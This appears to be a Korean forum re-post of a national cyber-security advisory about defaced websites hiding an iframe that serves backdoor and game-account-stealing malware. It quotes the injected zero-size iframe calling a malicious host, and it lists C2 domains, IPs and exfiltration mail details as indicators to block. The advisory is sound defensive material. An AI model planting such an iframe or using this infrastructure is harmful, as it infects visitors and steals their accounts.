SIR - 개발자 커뮤니티

MBC ESPN, MSN Korea 등 최근 웹페이지 변조 후 특정코드를 숨겨 놓아 악성프로그램 유포에 악용하는 사고가 증가하고 있으므로 주의하시기 바랍니다.

각급기관은 홈페이지 서버의 보안패치를 확인하고 특히, 홈페이지내에 iframe 태그를 이용한 수상한 코드삽입 여부를 확인 하는 등 주의하시기 바랍니다.

※ 위 내용은 제 메일로 온 내용을 이곳 홈페이지 관리자분들에게 참고할 수 있게 복사 붙이기 한것입니다.... 참고가 되었으면 하는 바램입니다.

■ 주요특징

o 해킹에 의해 변조된 웹페이지를 방문시 http://hangamegogo.17mo.net으로부터 악성코드를 다운로드

o 다운로드 되는 악성코드는 MS취약점을 이용하여 백도어 및 계정유출 프로그램을 자동설치하고 실행함

o 감염에 이용되는 파일에 대한 정보는 다음과 같음

악성코드 종류	주요 특징
HangHack Troijan	o 감염되면 syshlp.dll 파일이 생성되고, iexplore.exe에 인젝션되어 실행 o 온라인게임 계정 및 패스워드를 유출 (smtp.tom.com:25 연결 후 메일전송)
GrayBird.bk Backdoor	o 리버스커넥션하는 백도어 프로그램 o 감염되면 svchost.exe와 램덤한파일명.dat(ex. yiykbs.dat) 두개의 파일이 생성되고, 랜덤한파일명.dat는 다른 프로세스에 인젝션되어 실행됨 o vip.huigezi.com(61.152.93.13)로부터 특정파일 다운로드하고, 222.181.170.35:21 또는 222.181.169.159:21로 리버스커넥션 요청함 o 은폐형으로 동작하여 프로세스 목록이나 파일보기에서 확인 불가능 (c:\windows\dhcp 폴더 내에 백도어 파일이 존재하지만, 보이지는 않음) o GrayBird Client를 이용하여 시스템 정보 및 파일유출 가능함
phel.q Exploit	o MS04-013, MS05-001 취약점을 이용하는 Exploit 코드 o Psyme Trojan Downloader 파일을 다운로드 후 실행시킴
phel.c Exploit	o MS05-001 취약점 Exploit 코드 o HangHack Troijan 파일 다운로드 후 자동설치
Psyme Trojan Downloader	o MS05-001 취약점 Exploit 코드 o GrayBird.bk Backdoor를 시스템에 자동설치하기 위한 도움말 파일

* 변조된 웹페이지를 방문하여 악성코드가 삽입된 페이지를 열람하여도, 최신보안패치(MS04-013, MS05-001)가 된 경우에는 감염되지 않음. 일부 백신에서는 악성코드가 삽입된 페이지 (HTML 파일) 자체도 탐지하므로, 변조된 웹페이지를 방문시에 바이러스탐지 알람이 나타나기도 하지만 실제로 감염되는 것은 아님.

즉, 감염확인은 HangHack Trojan의 경우 c:\windows\system32\syshlp.dll파일, GrayBird.bk의 경우는 c:\windows\dhcp 폴더가 존재여부로 판단

■ 대응책

악코드 종류	주요 특징
홈페이지 관리자 및 운영자	o 홈페이지에 다음과 같은 코드의 삽입여부를 확인 (특히, 메인페이지의 경우 집중 확인) <iframe src=http://hangamegogo.17mo.net/swh width=0 height=0></iframe> * URL 정보는 변경될 수 있으므로 불필요한 iframe, object 태그 등을 확인 o 홈페이지 서버에 최신 보안패치가 적용되었는지 확인 o 외부로부터 웹서버에 대한 해킹시도를 중점 모니터링 수행
네트워크 관리자	o 다음의 도메인 또는 IP 접속을 차단함 hangamegogo.17mo.net vip.huigezi.com (61.152.93.13) 222.181.169.159, 222.181.170.35 (21/tcp) smtp.tom.com (25/tcp) o 다음의 도메인 또는 IP에 접속시도하는 PC를 찾아 조치 vip.huigezi.com (61.152.93.13 8000~8005/tcp) 222.181.169.159, 222.181.170.35 (21/tcp) smtp.tom.com (25/tcp) o 다음형식의 메일 전송을 탐지 메일서버주소 : smtp.tom.com 보내는 주소: koreanlin@tom.com 받는 주소: koreanhangame@tom.com 제목 : give you 내용: <hangme>: 계정, 패스워드 <hangame>
개인사용자	o 각 백신제품을 이용하여 자동업데이트 및 수동업데이트 실시 o 최신 윈도우즈 보안패치 실시

■ 참고사이트

	o		안철수연구소 Win-Trojan/HangHack.26624 → http://info.ahnlab.com/smart2u/virus_detail_2419.html Dropper/GrayBird.385024 → http://info.ahnlab.com/smart2u/virus_detail_2417.html
	o		잉카인터넷 Trojan/W32.HangHack.26624 → http://www.nprotect.com/v5/contents/index.php?mode=virus_view&no=322
	o		지오트 Trojan-PSW.Win32.Lineage.hc → http://geot.com/virus/virus_info_view.php?db=virus&no=647&page=

<국가사이버안전센터>홈페이지 변조 후 은닉된 악성프로그램 유포 주의

게시물 신고

댓글 6개

댓글 작성